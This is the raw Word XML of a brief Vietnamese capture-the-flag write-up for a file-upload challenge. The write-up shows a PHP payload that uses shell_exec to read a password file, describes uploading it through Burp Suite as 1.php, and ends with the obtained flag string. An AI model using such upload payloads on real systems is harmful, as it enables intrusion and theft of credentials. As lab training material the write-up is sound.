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3E72" w14:textId="1766716C" w:rsidR="006A4487" w:rsidRDefault="006A4487">
      <w:r>
        <w:t>Đầu tiên vào trang ta thấy trang không filter phần upload, thực hiện tạo payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A16B89" w14:textId="77777777" w:rsidR="006A4487" w:rsidRDefault="006A4487" w:rsidP="006A4487">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA72DA7" w14:textId="77777777" w:rsidR="006A4487" w:rsidRDefault="006A4487" w:rsidP="006A4487">
      <w:r>
        <w:t xml:space="preserve">    $output = shell_exec('cat</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/../../.passwd');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8F3310" w14:textId="77777777" w:rsidR="006A4487" w:rsidRDefault="006A4487" w:rsidP="006A4487">
      <w:r>
        <w:t xml:space="preserve">    echo "&lt;pre&gt;$output&lt;/pre&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5127C6B7" w14:textId="7FA6CD04" w:rsidR="006A4487" w:rsidRDefault="006A4487" w:rsidP="006A4487">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023A54F0" w14:textId="38B46C69" w:rsidR="006A4487" w:rsidRDefault="006A4487" w:rsidP="006A4487">
      <w:r>
        <w:t>Thực hiện gửi bằng burpsuite lên và đổi tên file thành 1.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4769F9C7" w14:textId="7F37295A" w:rsidR="006A4487" w:rsidRDefault="006A4487" w:rsidP="006A4487">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1115624E" wp14:editId="47AAD195">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15552072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072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3DD8" w14:textId="640E8AFA" w:rsidR="006A4487" w:rsidRDefault="006A4487">
      <w:r>
        <w:t>Thực hiện click vào 1.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0E94E" w14:textId="77777777" w:rsidR="006A4487" w:rsidRDefault="006A4487">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EFD024A" wp14:editId="0A684DE1">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="805226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264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F8F" w14:textId="230CEF36" w:rsidR="00C54FA4" w:rsidRDefault="006A4487">
      <w:r>
        <w:t>Ta có được flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D5917A8" wp14:editId="118BAAD2">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1333182296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2296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6576" w14:textId="77777777" w:rsidR="00576246" w:rsidRPr="00576246" w:rsidRDefault="00576246" w:rsidP="00576246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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576246">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Times New Roman" w:hAnsi="Arial Unicode MS" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>a7n4nizpgQgnPERy89uanf6T4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33DFFE" w14:textId="77777777" w:rsidR="00576246" w:rsidRDefault="00576246"/>
    <w:sectPr w:rsidR="0057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C6"/>
    <w:rsid w:val="002716C6"/>
    <w:rsid w:val="00576246"/>
    <w:rsid w:val="006A4487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FC74"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{14DEE699-54AA-4153-BA23-9CDE1870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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-15T14:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-15T15:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>